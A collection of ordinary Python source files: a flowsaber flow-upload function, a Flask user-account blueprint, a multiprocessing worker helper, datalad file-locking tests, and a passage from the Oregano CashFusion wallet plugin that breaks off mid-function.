async def upload_and_run():
client = Client(server_address)
flowsaber.context.logger.info(f"Upload the flow onto the server: {server_address}")
try:
# test if the flow already exists in server.
await client.query("get_flow", flow.config.id, "id")
except GraphqlError:
await client.mutation("create_flow", flow.serialize(), "id")
await client.query("get_flow", flow.config.id, "id")
flowsaber.context.logger.info(f"Scheduling the flow run in server: {server_address}")
flowrun_data = await client.mutation("update_flowrun", flowrun_input, 'id name labels')
flowsaber.context.logger.info(f"Scheduled the flow run: {flowrun_data} in server: {server_address} ")
await client.close()
return flowrun_data
if not loop.is_running():
return asyncio.run(upload_and_run())
else:
return asyncio.create_task(upload_and_run())
|
views.py
|
# Mostly copied from https://gitlab.com/patkennedy79/flask_recipe_app/blob/master/web/project/users/views.py
#################
#### imports ####
#################
from flask import render_template, Blueprint, request, redirect, url_for, flash, abort
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from flask_mail import Message
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
from .forms import RegisterForm, LoginForm, EmailForm, PasswordForm
from dynitag import db, mail, app
from dynitag.models import User
################
#### config ####
################
users_blueprint = Blueprint('users', __name__)
##########################
#### helper functions ####
##########################
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
def send_async_email(msg):
with app.app_context():
mail.send(msg)
def send_email(subject, recipients, html_body):
msg = Message(subject, recipients=recipients)
msg.html = html_body
thr = Thread(target=send_async_email, args=[msg])
thr.start()
def send_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
confirm_url = url_for(
'users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
html = render_template(
'user/email_confirmation.html',
confirm_url=confirm_url)
print("sending email")
send_email('Confirm Your Email Address', [user_email], html)
def send_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
password_reset_url = url_for(
'users.reset_with_token',
token = password_reset_serializer.dumps(user_email, salt='password-reset-salt'),
_external=True)
html = render_template(
'user/email_password_reset.html',
password_reset_url=password_reset_url)
send_email('Password Reset Requested', [user_email], html)
################
#### routes ####
################
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegisterForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.username.data, form.email.data, form.password.data)
new_user.authenticated = True
db.session.add(new_user)
db.session.commit()
login_user(new_user)
send_confirmation_email(new_user.email)
flash('Thanks for registering! Please check your email to confirm your email address.', 'success')
return redirect("/")
except IntegrityError:
db.session.rollback()
flash('Email ({}) already exists.'.format(form.email.data), 'error')
return render_template('user/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.last_logged_in = user.current_logged_in
user.current_logged_in = datetime.now()
db.session.add(user)
db.session.commit()
login_user(user)
return redirect("/projects")
else:
flash('Incorrect login credentials.', 'error')
return render_template('user/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
return redirect(url_for('index'))
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except:
flash('The confirmation link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
db.session.add(user)
db.session.commit()
flash('Thank you for confirming your email address!', 'success')
return redirect("/")
@users_blueprint.route('/reset', methods=["GET", "POST"])
def reset():
form = EmailForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=form.email.data).first_or_404()
except:
flash('Invalid email address!', 'error')
return render_template('user/password_reset_email.html', form=form)
if user.email_confirmed:
send_password_reset_email(user.email)
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('users.login'))
return render_template('user/password_reset_email.html', form=form)
@users_blueprint.route('/reset/<token>', methods=["GET", "POST"])
def reset_with_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
form = PasswordForm()
if form.validate_on_submit():
try:
user = User.query.filter_by(email=email).first_or_404()
except:
flash('Invalid email address!', 'error')
return redirect(url_for('users.login'))
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('users.login'))
return render_template('user/reset_password_with_token.html', form=form, token=token)
@users_blueprint.route('/user_profile')
@login_required
def user_profile():
return render_template('user/user_profile.html')
@users_blueprint.route('/email_change', methods=["GET", "POST"])
@login_required
def user_email_change():
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user = current_user
user.email = form.email.data
user.email_confirmed = False
user.email_confirmed_on = None
user.email_confirmation_sent_on = datetime.now()
db.session.add(user)
db.session.commit()
send_confirmation_email(user.email)
flash('Email changed! Please confirm your new email address (link sent to new email).', 'success')
return redirect(url_for('users.user_profile'))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('user/email_change.html', form=form)
@users_blueprint.route('/password_change', methods=["GET", "POST"])
@login_required
def user_password_change():
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user = current_user
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('users.user_profile'))
return render_template('user/password_change.html', form=form)
@users_blueprint.route('/resend_confirmation')
@login_required
def resend_email_confirmation():
try:
send_confirmation_email(current_user.email)
flash('Email sent to confirm your email address. Please check your email!', 'success')
except IntegrityError:
flash('Error! Unable to send email to confirm your email address.', 'error')
return redirect(url_for('users.user_profile'))
@users_blueprint.route('/admin_view_users')
@login_required
def admin_view_users():
if current_user.role != 'admin':
abort(403)
else:
users = User.query.order_by(User.id).all()
return render_template('user/admin_view_users.html', users=users)
return redirect(url_for('users.login'))
|
gmproc.py
|
import multiprocessing as mp
import time
class Workers:
def __init__(self):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
def add(self, id, target, params=None):
self.targets[id] = ProcessWrapper(id, target, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None):
if ids is None:
ids = self.targets.keys()
for k in ids:
p = self.targets[k]
pr = mp.Process(target=p.run, args=(p.id, self.queue, p.params))
pr.start()
id, value = self.queue.get()
self.results[id] = value
pr.join()
return self.results
class ClientServer:
def __init__(self, server, clients_delay = 0.1):
self.targets = {}
self.queue = mp.Queue()
self.results = {}
self.server = ServerWrapper(server)
self.clients_delay = 0.1
def add(self, id, client, params=None):
self.targets[id] = ClientWrapper(id, client, params)
def set_params(self, id, new_value):
self.targets[id].params = new_value
def run(self, ids=None):
if ids is None:
ids = self.targets.keys()
cqueue = {}
for k in ids:
p = self.targets[k]
pr = mp.Process(target=p.run, args=(p.id, p.queue, self.queue, p.params))
cqueue[p.id] = p.queue
p.process = pr
pr.start()
ps = mp.Process(target=self.server.run, args=(cqueue, self.queue))
ps.start()
time.sleep(self.clients_delay)
ps.join()
for k in ids:
c = self.targets[k]
for key in cqueue.keys():
cqueue[key].close()
if c.process is not None:
c.process.join()
c.queue.close()
self.queue.close()
class ProcessWrapper:
def __init__(self, id, target, params=None):
self.id = id
self.target = target
self.params = params
def run(self, id, queue, params):
value = self.target(params)
queue.put( (id, value) )
class ClientWorker:
def __init__(self):
pass
def start(self):
pass
def process(self):
pass
def update(self):
pass
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWorker:
def __init__(self):
pass
def start(self):
pass
def process(self, id, msg):
return None
def wait(self):
pass
def finish(self):
pass
def done(self):
return False
class ServerWrapper:
def __init__(self, target):
self.target = target
def run(self, cqueue, squeue):
self.target.start()
while not self.target.done():
id, msg = squeue.get()
response = self.target.process(id, msg)
if response is not None:
cqueue[id].put(response)
self.target.wait()
self.target.finish()
class ClientWrapper(ProcessWrapper):
def __init__(self, id, target, params=None):
super().__init__(id, target, params)
self.queue = mp.Queue()
self.process = None
def run(self, id, cqueue, squeue, params):
obj = self.target()
obj.start()
while not obj.done():
msg = obj.process()
squeue.put( (id, msg) )
response = cqueue.get()
obj.update(response)
obj.wait()
obj.finish()
|
test_locking.py
|
#emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
#ex: set sts=4 ts=4 sw=4 et:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
import os
import os.path as op
import sys
from fasteners import InterProcessLock
from pathlib import Path
from time import time
from ...cmd import (
CommandError,
StdOutErrCapture,
WitlessRunner,
)
from ..locking import (
lock_if_check_fails,
try_lock_informatively,
)
from ...utils import ensure_unicode
from datalad.tests.utils import (
assert_false,
assert_greater,
assert_true,
assert_in,
assert_not_in,
assert_raises,
eq_,
ok_,
ok_exists,
on_osx,
with_tempfile,
)
class Subproc:
# By implementing this closure as a class instead of as a nested function,
# it becomes possible to pickle it.
def __init__(self, tempfile):
self.tempfile = tempfile
def __call__(self, q):
with lock_if_check_fails(False, self.tempfile, blocking=False, _return_acquired=True)\
as (_, lock2, acquired):
# we used to check for .acquired here but it was removed from
# fasteners API: https://github.com/harlowja/fasteners/issues/71
q.put(acquired)
@with_tempfile
def test_lock_if_check_fails(tempfile):
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(True, None) as (check, lock):
assert check is True
assert lock is None
assert check # still available outside
# and with a callable
with lock_if_check_fails(lambda: "valuable", None) as (check, lock):
eq_(check, "valuable")
assert lock is None
eq_(check, "valuable")
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile) as (check, lock):
ok_(lock)
ok_exists(tempfile + '.lck')
assert not op.exists(tempfile + '.lck') # and it gets removed after
# the same with providing operation
# basic test, should never try to lock so filename is not important
with lock_if_check_fails(False, tempfile, operation='get') as (check, lock):
ok_(lock)
ok_exists(tempfile + '.get-lck')
assert not op.exists(tempfile + '.get-lck') # and it gets removed after
from multiprocessing import Queue, Process
q = Queue()
p = Process(target=Subproc(tempfile), args=(q,))
# now we need somehow to actually check the bloody lock functioning
with lock_if_check_fails((op.exists, (tempfile,)), tempfile, _return_acquired=True) as (check, lock, acquired):
eq_(check, False)
ok_(lock)
ok_(acquired)
# but now we will try to lock again, but we need to do it in another
# process
p.start()
assert q.get() is False
p.join()
with open(tempfile, 'w') as f:
pass
ok_exists(tempfile)
ok_exists(tempfile)
# and we redo -- it will acquire it
p = Process(target=Subproc(tempfile), args=(q,))
p.start()
ok_(q.get())
p.join()
@with_tempfile
def test_try_lock_informatively(tempfile):
lock = InterProcessLock(tempfile + '.lck')
lock_path = ensure_unicode(lock.path) # can be bytes, complicates string formattingetc
t0 = time()
with try_lock_informatively(lock, purpose="happy life") as acquired:
assert_true(lock.acquired)
assert_true(acquired)
assert_greater(2, time() - t0) # should not take any notable time, we cannot be blocking
"""
# InterProcessLock is not re-entrant so nesting should not be used, will result
# in exception on release
with try_lock_informatively(lock, timeouts=[dt, dt*2], proceed_unlocked=True) as acquired:
assert_true(lock.acquired) # due to outer cm
assert_true(acquired) # lock is reentrant apparently
"""
# Let's try in a completely different subprocess
runner = WitlessRunner(env=dict(os.environ, DATALAD_LOG_LEVEL='info', DATALAD_LOG_TARGET='stderr'))
script1 = Path(tempfile + "-script1.py")
script1_fmt = f"""
from fasteners import InterProcessLock
from time import time
from datalad.support.locking import try_lock_informatively
lock = InterProcessLock({lock_path!r})
with try_lock_informatively(lock, timeouts=[0.05, 0.15], proceed_unlocked={{proceed_unlocked}}) as acquired:
print("Lock acquired=%s" % acquired)
"""
script1.write_text(script1_fmt.format(proceed_unlocked=True))
t0 = time()
res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in('Lock acquired=False', res['stdout'])
assert_in(f'Failed to acquire lock at {lock_path} in 0.05', res['stderr'])
assert_in(f'Failed to acquire lock at {lock_path} in 0.15', res['stderr'])
assert_in('proceed without locking', res['stderr'])
assert_greater(time() - t0, 0.19999) # should wait for at least 0.2
try:
import psutil
# PID does not correspond
assert_in('Check following process: PID=', res['stderr'])
assert_in(f'CWD={os.getcwd()} CMDLINE=', res['stderr'])
except ImportError:
pass # psutil was not installed, cannot get list of files
except AssertionError:
# we must have had the other one then
assert_in('failed to determine one', res['stderr'])
if not on_osx:
# so far we had only OSX reporting failing to get PIDs information
# but if it is something else -- re-raise original exception
raise
# in 2nd case, lets try without proceeding unlocked
script1.write_text(script1_fmt.format(proceed_unlocked=False))
t0 = time()
with assert_raises(CommandError) as cme:
runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in(f"Failed to acquire lock at {lock_path} in 2 attempts.", str(cme.exception))
assert_in(f"RuntimeError", str(cme.exception))
assert_false(cme.exception.stdout) # nothing there since print should not happen
assert_in(f'Failed to acquire lock at {lock_path} in 0.05', cme.exception.stderr)
assert_in(f'Failed to acquire lock at {lock_path} in 0.15', cme.exception.stderr)
assert_greater(time() - t0, 0.19999) # should wait for at least 0.2
# now that we left context, should work out just fine
res = runner.run([sys.executable, str(script1)], protocol=StdOutErrCapture)
assert_in('Lock acquired=True', res['stdout'])
assert_not_in(f'Failed to acquire lock', res['stderr'])
assert_not_in('PID', res['stderr'])
|
plugin.py
|
#!/usr/bin/env python3
#
# Oregano - a lightweight Ergon client
# CashFusion - an advanced coin anonymizer
#
# Copyright (C) 2020 Mark B. Lundeberg
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Base plugin (non-GUI)
"""
import math
import threading
import time
import weakref
from typing import Optional, Tuple
from oregano.address import Address
from oregano.bitcoin import COINBASE_MATURITY
from oregano.plugins import BasePlugin, hook, daemon_command
from oregano.i18n import _, ngettext, pgettext
from oregano.util import profiler, PrintError, InvalidPassword
from oregano import Network, networks
from .conf import Conf, Global
from .fusion import Fusion, can_fuse_from, can_fuse_to, is_tor_port, MIN_TX_COMPONENTS
from .server import FusionServer
from .covert import limiter
import random # only used to select random coins
TOR_PORTS = [9050, 9150]
# if more than <N> tor connections have been made recently (see covert.py) then don't start auto-fuses.
AUTOFUSE_RECENT_TOR_LIMIT_LOWER = 60
# if more than <N> tor connections have been made recently (see covert.py) then shut down auto-fuses that aren't yet started
AUTOFUSE_RECENT_TOR_LIMIT_UPPER = 120
# heuristic factor: guess that expected number of coins in wallet in equilibrium is = (this number) / fraction
COIN_FRACTION_FUDGE_FACTOR = 10
# for semi-linked addresses (that share txids in their history), allow linking them with this probability:
KEEP_LINKED_PROBABILITY = 0.1
# how long an auto-fusion may stay in 'waiting' state (without starting-soon) before it cancels itself
AUTOFUSE_INACTIVE_TIMEOUT = 600
# how many random coins to select max in 1 batch -- used by select_random_coins
DEFAULT_MAX_COINS = 20
assert DEFAULT_MAX_COINS > 10
# how many autofusions can be running per-wallet
MAX_AUTOFUSIONS_PER_WALLET = 10
CONSOLIDATE_MAX_OUTPUTS = MIN_TX_COMPONENTS // 3
pnp = None
def get_upnp():
""" return an initialized UPnP singleton """
global pnp
if pnp is not None:
return pnp
try:
import miniupnpc
except ImportError:
raise RuntimeError("python miniupnpc module not installed")
u = miniupnpc.UPnP()
if u.discover() < 1:
raise RuntimeError("can't find UPnP server")
try:
u.selectigd()
except Exception as e:
raise RuntimeError("failed to connect to UPnP IGD")
pnp = u
return u
def select_coins(wallet):
""" Sort the wallet's coins into address buckets, returning two lists:
- Eligible addresses and their coins.
- Ineligible addresses and their coins.
An address is eligible if it satisfies all conditions:
- the address is unfrozen
- has 1, 2, or 3 utxo
- all utxo are confirmed (or matured in case of coinbases)
- has no SLP utxo or frozen utxo
"""
# First, select all the coins
eligible = []
ineligible = []
has_unconfirmed = False
has_coinbase = False
sum_value = 0
mincbheight = (wallet.get_local_height() + 1 - COINBASE_MATURITY if Conf(wallet).autofuse_coinbase
else -1) # -1 here causes coinbase coins to always be rejected
for addr in wallet.get_addresses():
acoins = list(wallet.get_addr_utxo(addr).values())
if not acoins:
continue # prevent inserting empty lists into eligible/ineligible
good = True
if addr in wallet.frozen_addresses:
good = False
for i,c in enumerate(acoins):
sum_value += c['value'] # tally up values regardless of eligibility
# If too many coins, any SLP tokens, any frozen coins, or any
# immature coinbase on the address -> flag all address coins as
# ineligible if not already flagged as such.
good = good and (
i < 3 # must not have too many coins on the same address*
and not c['slp_token'] # must not be SLP
and not c['is_frozen_coin'] # must not be frozen
and (not c['coinbase'] or c['height'] <= mincbheight) # if coinbase -> must be mature coinbase
)
# * = We skip addresses with too many coins, since they take up lots
# of 'space' for consolidation. TODO: there is possibility of
# disruption here, if we get dust spammed. Need to deal with
# 'dusty' addresses by ignoring / consolidating dusty coins.
# Next, detect has_unconfirmed & has_coinbase:
if c['height'] <= 0:
# Unconfirmed -> Flag as not eligible and set the has_unconfirmed flag.
good = False
has_unconfirmed = True
# Update has_coinbase flag if not already set
has_coinbase = has_coinbase or c['coinbase']
if good:
eligible.append((addr,acoins))
else:
ineligible.append((addr,acoins))
return eligible, ineligible, int(sum_value), bool(has_unconfirmed), bool(has_coinbase)
def select_random_coins(wallet, fraction, eligible):
"""
Grab wallet coins with a certain probability, while also paying attention
to obvious linkages and possible linkages.
Returns list of list of coins (bucketed by obvious linkage).
"""
# First, we want to bucket coins together when they have obvious linkage.
# Coins that are linked together should be spent together.
# Currently, just look at address.
addr_coins = eligible
random.shuffle(addr_coins)
# While fusing we want to pay attention to semi-correlations among coins.
# When we fuse semi-linked coins, it increases the linkage. So we try to
# avoid doing that (but rarely, we just do it anyway :D).
# Currently, we just look at all txids touched by the address.
# (TODO this is a disruption vector: someone can spam multiple fusions'
# output addrs with massive dust transactions (2900 outputs in 100 kB)
# that make the plugin think that all those addresses are linked.)
result_txids = set()
result = []
num_coins = 0
for addr, acoins in addr_coins:
if num_coins >= DEFAULT_MAX_COINS:
break
elif num_coins + len(acoins) > DEFAULT_MAX_COINS:
continue
# For each bucket, we give a separate chance of joining.
if random.random() > fraction:
continue
# Semi-linkage check:
# We consider all txids involving the address, historical and current.
ctxids = {txid for txid, height in wallet.get_address_history(addr)}
collisions = ctxids.intersection(result_txids)
# Note each collision gives a separate chance of discarding this bucket.
if random.random() > KEEP_LINKED_PROBABILITY**len(collisions):
continue
# OK, no problems: let's include this bucket.
num_coins += len(acoins)
result.append(acoins)
result_txids.update(ctxids)
if not result:
# nothing was selected, just try grabbing first nonempty bucket
try:
res = next(coins for addr,coins in addr_coins if coins)
result = [res]
except StopIteration:
# all eligible buckets were cleared.
pass
return result
def get_target_params_1(wallet, wallet_conf, active_autofusions, eligible):
""" WIP -- TODO: Rename this function. """
wallet_conf = Conf(wallet)
mode = wallet_conf.fusion_mode
# Note each fusion 'consumes' a certain number of coins by freezing them,
# so that the next fusion has less eligible coins to work with. So each
# call to this may see a smaller n_buckets.
n_buckets = len(eligible)
if mode == 'normal':
return max(2, round(n_buckets / DEFAULT_MAX_COINS)), False
elif mode == 'fan-out':
return max(4, math.ceil(n_buckets / (COIN_FRACTION_FUDGE_FACTOR*0.65))), False
elif mode == 'consolidate':
if n_buckets < MIN_TX_COMPONENTS - CONSOLIDATE_MAX_OUTPUTS:
# Too few eligible buckets to make an effective consolidation.
return 0, False
# In the latter stages of consolidation, only do one fusion
# at a time with all-confirmed rule, to make sure each fusion's outputs
# may be consumed by the subsequent one.
# To avoid weird loops, try to calculate the TOTAL number of coins
# that are either 1) eligible or 2) being fused. (Should stay constant
# as fusions are added/cancelled)
n_coins = sum(len(acoins) for addr,acoins in eligible)
n_total = n_coins + sum(len(getattr(f, 'inputs', ())) for f in active_autofusions)
if n_total < DEFAULT_MAX_COINS*3:
return 1, True
# If coins are scarce then don't make more autofusions unless we
# have none.
if n_buckets < DEFAULT_MAX_COINS*2:
return 1, False
# We still have lots of coins left, so request another autofusion.
return MAX_AUTOFUSIONS_PER_WALLET, False
else: # 'custom'
target_num_auto = wallet_conf.queued_autofuse
confirmed_only = wallet_conf.autofuse_confirmed_only
return int(target_num_auto), bool(confirmed_only)
def get_target_params_2(wallet_conf, sum_value):
""" WIP -- TODO: Rename this function. """
mode = wallet_conf.fusion_mode
fraction = 0.1
if mode == 'custom':
# Determine the fraction that should be used
select_type, select_amount = wallet_conf.selector
if select_type == 'size' and int(sum_value) != 0:
# user wants to get a typical output of this size (in fixs)
fraction = COIN_FRACTION_FUDGE_FACTOR * select_amount / sum_value
elif select_type == 'count' and int(select_amount) != 0:
# user wants this number of coins
fraction = COIN_FRACTION_FUDGE_FACTOR / select_amount
elif select_type == 'fraction':
# user wants this fraction
fraction = select_amount
# note: fraction at this point could be <0 or >1 but doesn't matter.
elif mode == 'consolidate':
fraction = 1.0
elif mode == 'normal':
fraction = 0.5
elif mode == 'fan-out':
fraction = 0.1
return fraction
class FusionPlugin(BasePlugin):
fusion_server = None
active = True
_run_iter = 0
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs) # gives us self.config
# Do an initial check on the tor port
self.tor_port_good = None
t = threading.Thread(name = 'Fusion-scan_torport_initial', target = self.scan_torport)
t.start()
# quick lock for the following two WeakKeyDictionary variables
# Locking order wallet.lock -> plugin.lock.
self.lock = threading.Lock()
self.fusions = weakref.WeakKeyDictionary()
self.autofusing_wallets = weakref.WeakKeyDictionary() # wallet -> password
self.t_last_net_ok = time.monotonic()
self.remote_donation_address: str = '' # optionally announced by the remote server in 'serverhello' message
if tuple(self.config.get('cashfusion_server', ())) == ('cashfusion.oregano.dk', 8787, False):
# User's config has the old default non-SSL server. If we see this,
# just wipe the config key so that the new default is used.
# But only reset once, after that let them go back if that is what
# they truly desire.
if self.config.get('cashfusion_server_defaultresetted', 0) < 1:
self.config.set_key('cashfusion_server', None)
self.config.set_key('cashfusion_server_defaultresetted', 1)
def on_close(self,):
super().on_close()
self.stop_fusion_server()
self.active = False
def fullname(self):
return 'CashFusion'
def description(self):
return _("CashFusion Protocol")
def is_available(self):
return networks.net is not networks.TaxCoinNet
def set_remote_donation_address(self, address : str):
self.remote_donation_address = ((isinstance(address, str) and address) or '')[:100]
def get_server(self, ):
return Global(self.config).server
def set_server(self, host, port, ssl):
gconf = Global(self.config)
old = gconf.server
gconf.server = (host, port, ssl) # type/sanity checking done in setter
if old != gconf.server:
self.on_server_changed()
def get_torhost(self):
if self.has_auto_torport():
return Global.Defaults.TorHost
else:
return Global(self.config).tor_host
def set_torhost(self, host):
''' host should be a valid hostname '''
if not host: return
Global(self.config).tor_host = host
def has_auto_torport(self, ):
return Global(self.config).tor_port_auto
def get_torport(self, ):
''' Retreive either manual port or autodetected port; may return None
if 'auto' mode and no Tor port has been autodetected. (this is non-blocking) '''
if self.has_auto_torport():
return self.tor_port_good
else:
return Global(self.config).tor_port_manual
def set_torport(self, port):
# port may be 'auto' or 'manual' or an int
gconf = Global(self.config)
if port == 'auto':
gconf.tor_port_auto = True
return
else:
gconf.tor_port_auto = False
if port == 'manual':
return # we're simply going to use whatever manual port was already set
assert isinstance(port, int)
gconf.tor_port_manual = port
def scan_torport(self, ):
''' Scan for Tor proxy on either the manual port or on a series of
automatic ports. This is blocking. Returns port if it's up, or None if
down / can't find. '''
host = self.get_torhost()
if self.has_auto_torport():
portlist = []
network = Network.get_instance()
if network:
tc = network.tor_controller
if tc and tc.is_enabled() and tc.active_socks_port:
portlist.append(tc.active_socks_port)
portlist.extend(TOR_PORTS)
else:
portlist = [ Global(self.config).tor_port_manual ]
for port in portlist:
if is_tor_port(host, port):
self.tor_port_good = port
break
else:
self.tor_port_good = None
return self.tor_port_good
def on_server_changed(self):
""" When the server is changed, we stop all extant fusions that are not
already 'running' in order to allow for the new change to take effect
immediately. """
self.remote_donation_address = ''
self.stop_all_fusions('Server changed', not_if_running=True)
def get_all_fusions(self, ):
""" Return all still-live fusion objects that have been created using .start_fusion(),
including autofusions and any other fusions. """
with self.lock:
fusions_and_times = list(self.fusions.items())
fusions_and_times.sort(key=lambda x:x[1])
return [f for f,t in fusions_and_times]
def stop_all_fusions(self, reason, *, not_if_running=True):
with self.lock:
for f in list(self.fusions):
f.stop(reason, not_if_running = not_if_running)
@staticmethod
def stop_autofusions(wallet, reason, *, not_if_running=True):
with wallet.lock:
try:
fusion_weakset = wallet._fusions_auto
except AttributeError:
return []
running = []
for f in list(fusion_weakset):
if not f.is_alive():
fusion_weakset.discard(f)
continue
f.stop(reason, not_if_running = not_if_running)
if f.status[0] == 'running':
running.append(f)
return running
def disable_autofusing(self, wallet):
with self.lock:
self.autofusing_wallets.pop(wallet, None)
Conf(wallet).autofuse = False
return self.stop_autofusions(wallet, 'Autofusing disabled', not_if_running=True)
def enable_autofusing(self, wallet, password):
if password is None and wallet.has_password():
raise InvalidPassword()
else:
wallet.check_password(password)
with self.lock:
self.autofusing_wallets[wallet] = password
Conf(wallet).autofuse = True
def is_autofusing(self, wallet):
with self.lock:
return (wallet in self.autofusing_wallets)
def add_wallet(self, wallet, password=None):
''' Attach the given wallet to fusion plugin, allowing it to be used in
fusions with clean shutdown. Also start auto-fusions for wallets that want
it (if no password).
'''
with wallet.lock:
# Generate wallet._fusions and wallet._fusions_auto; these must
# only be accessed with wallet.lock held.
# all fusions relating to this wallet, either as source or target
# or both.
wallet._fusions = weakref.WeakSet()
# fusions that were auto-started.
wallet._fusions_auto = weakref.WeakSet()
# all accesses to the above must be protected by wallet.lock
if Conf(wallet).autofuse:
try:
self.enable_autofusing(wallet, password)
except InvalidPassword:
self.disable_autofusing(wallet)
def remove_wallet(self, wallet):
''' Detach the provided wallet; returns list of active fusion threads. '''
with self.lock:
self.autofusing_wallets.pop(wallet, None)
fusions = ()
try:
with wallet.lock:
fusions = list(wallet._fusions)
del wallet._fusions
del wallet._fusions_auto
except AttributeError:
pass
return [f for f in fusions if f.is_alive()]
def start_fusion(self, source_wallet, password, coins, target_wallet = None, max_outputs = None, inactive_timeout = None):
""" Create and start a new Fusion object with current server/tor settings.
Both source_wallet.lock and target_wallet.lock must be held.
FIXME: this condition is begging for a deadlock to happen when the two wallets
are different. Need to find a better way if inter-wallet fusing actually happens.
"""
if target_wallet is None:
target_wallet = source_wallet # self-fuse
assert can_fuse_from(source_wallet)
assert can_fuse_to(target_wallet)
host, port, ssl = self.get_server()
if host == 'localhost':
# as a special exemption for the local fusion server, we don't use Tor.
torhost = None
torport = None
else:
torhost = self.get_torhost()
torport = self.get_torport()
if torport is None:
torport = self.scan_torport() # may block for a very short time ...
if torport is None:
self.notify_server_status(False, ("failed", _("Invalid Tor proxy or no Tor proxy found")))
raise RuntimeError("can't find tor port")
fusion = Fusion(self, target_wallet, host, port, ssl, torhost, torport)
fusion.add_coins_from_wallet(source_wallet, password, coins)
fusion.max_outputs = max_outputs
with self.lock:
fusion.start(inactive_timeout = inactive_timeout)
self.fusions[fusion] = time.time()
target_wallet._fusions.add(fusion)
source_wallet._fusions.add(fusion)
return fusion
def thread_jobs(self, ):
return [self]
def run(self, ):
# this gets called roughly every 0.1 s in the Plugins thread; downclock it to 5 s.
run_iter = self._run_iter + 1
if run_iter < 50:
self._run_iter = run_iter
return
else:
self._run_iter = 0
if not self.active:
return
dont_start_fusions = False
network = Network.get_instance()
if network and network.is_connected():
self.t_last_net_ok = time.monotonic()
else:
# Cashfusion needs an accurate picture of the wallet's coin set, so
# that we don't reuse addresses and we don't submit already-spent coins.
# Currently the network is not synced so we won't start new fusions.
dont_start_fusions = True
if time.monotonic() - self.t_last_net_ok > 31:
# If the network is disconnected for an extended period, we also
# shut down all waiting fusions. We can't wait too long because
# one fusion might succeed but then enter the 'time_wait' period
# where it is waiting to see the transaction on the network.
# After 60 seconds it gives up and then will unreserve addresses,
# and currently-waiting fusions would then grab those addresses when
# they begin rounds.
self.stop_all_fusions('Lost connection to Oregano server', not_if_running = True)
return
# Snapshot of autofusing list; note that remove_wallet may get
# called on one of the wallets, after lock is released.
with self.lock:
wallets_and_passwords = list(self.autofusing_wallets.items())
torcount = limiter.count
if torcount > AUTOFUSE_RECENT_TOR_LIMIT_UPPER:
# need tor cooldown, stop the waiting autofusions
for wallet, password in wallets_and_passwords:
